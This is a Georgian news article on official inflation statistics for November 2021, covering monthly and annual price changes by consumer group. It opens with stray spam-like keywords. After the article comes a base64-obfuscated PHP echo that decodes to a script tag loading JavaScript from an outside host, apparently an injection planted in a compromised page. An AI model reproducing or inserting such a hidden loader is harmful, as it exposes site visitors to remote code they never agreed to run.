celsiusi
ავერსი შნაიდერი
2021 წლის ნოემბერში, წინა თვესთან შედარებით, ინფლაციის დონემ საქართველოში 0.6 პროცენტი, ხოლო წლიური ინფლაციის დონემ 12.5% შეადგინა. ამის შესახებ ინფორმაციას სტატისტიკის ეროვნული სამსახური ავრცელებს.
 
მათივე ცნობით, სურსათსა და უალკოჰოლო სასმელებზე ფასები 0.6%-ით გაიზარდა, რაც თვის ინფლაციაზე 0.22% პუნქტით აისახა.
 
რაც შეეხება საბაზო ინფლაციას, უწყების ინფორმაციით, აღნიშნულმა მაჩვენებელმა 2021 წლის ნოემბერში, გასული წლის შესაბამის პერიოდთან შედარებით 6.1%  შეადგინა, თამბაქოს გარეშე წლიური საბაზო ინფლაციის მაჩვენებელი, ასევე, 6.1%-ით განისაზღვრა.
 
საქსტატის მონაცემებით, ყოველთვიური ინფლაციის მაჩვენებლის ფორმირებაზე ძირითადი გავლენა იქონია ფასების ცვლილებამ შემდეგ ჯგუფებზე:
 
„სურსათი და უალკოჰოლო სასმელები: ჯგუფში ფასები გაიზარდა 0.6%-ით, რაც თვის ინფლაციაზე 0.22% პუნქტით აისახა.
 
ფასები მომატებულია შემდეგ ქვეჯგუფებზე: რძე, ყველი და კვერცხი (4.4 პროცენტი), პური და პურპროდუქტები (1.5%), ყავა, ჩაი და კაკაო (1.3%), ზეთი და ცხიმი (1.0%). შაქარი, ჯემი და სხვა ტკბილეული (0.9%).
 
ამასთან, ფასები შემცირდა ბოსტნეულსა და ბაღჩეულზე (-5.1%), ასევე ხილსა და ყურძენზე (-2.6%);
 
ტრანსპორტის ჯგუფში ფასები გაიზარდა 1.7 პროცენტით, რაც 0.22%-ლი პუნქტით აისახა მთლიანი ინდექსის ზრდაზე. ფასები გაიზარდა პირადი სატრანსპორტო საშუალებების ექსპლუატაციაზე (2.4%); ავეჯი, საოჯახო ნივთები, სახლის მოვლა: ჯგუფში დაფიქსირდა ფასების 1.0%-ანი მატება, რაც თვის ინფლაციაზე 0.05%-ლი პუნქტით აისახა.
 
ფასები მომატებულია შემდეგ ქვეჯგუფებზე: ავეჯი, საოჯახო ნივთები, ხალიჩები და სხვა იატაკის საფარი (2.3%), მინის ჭურჭელი, მაგიდის და საოჯახო ჭურჭელი (2.1%), ყოველდღიური საყოფაცხოვრებო საჭიროების საქონელი და მომსახურება (2.0%).
 
წლიური ინფლაციის ფორმირებაზე ძირითადი გავლენა იქონია ფასების ცვლილებამ შემდეგ ჯგუფებზე: სურსათი და უალკოჰოლო სასმელები: ჯგუფში ფასები გაიზარდა 17.0%-ით, რაც წლიურ ინფლაციაზე 5.35%-ლი პუნქტით აისახა. ფასები მომატებულია შემდეგ ქვეჯგუფებზე: ზეთი და ცხიმი (27.7%), ბოსტნეული და ბაღჩეული (26.2%), პური და პურპროდუქტები (20.4%), რძე, ყველი და კვერცხი (17.9%), შაქარი, ჯემი და სხვა ტკბილეული (17.4%), თევზეული (16.0%), ხილი და ყურძენი (15.5%), მინერალური და წყაროს წყალი, უალკოჰოლო სასმელები და ნატურალური წვენები (13.6%), ხორცი და ხორცის პროდუქტები (10.7%), ყავა, ჩაი და კაკაო (6.9%);
 
ტრანსპორტის ჯგუფში ფასები გაიზარდა 20.2%-ით, რაც 2.5%-ლი პუნქტით აისახა მთლიანი ინდექსის ზრდაზე. ფასები გაიზარდა პირადი სატრანსპორტო საშუალებების ექსპლუატაციაზე (30.1%) და სატრანსპორტო მომსახურებაზე (2.6% ამასთან, ფასები შემცირდა სატრანსპორტო საშუალებების შეძენაზე (-3.3%);
 
საცხოვრებელი, წყალი, ელ.ენერგია, აირი: ჯგუფში დაფიქსირდა ფასების 11.5%-ნი მატება, რაც 1.68%-ლი პუნქტით აისახა წლიურ ინფლაციაზე. ფასები გაიზარდა ქვეჯგუფებზე: ელექტროენერგია, აირი და სათბობის სხვა სახეები (14.2%), საცხოვრებლის მიმდინარე მოვლა და შეკეთება (7.2%), წყალმომარაგება და საცხოვრებელთან დაკავშირებული სხვა მომსახურება (4.5%). ამასთან, ფასები შემცირდა საცხოვრებლის ფაქტიურ გადასახადზე (-2.0%)“, - აღნიშნულია „საქსტატის“ მიერ გავრცელებულ ინფორმაციაში.
1202
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");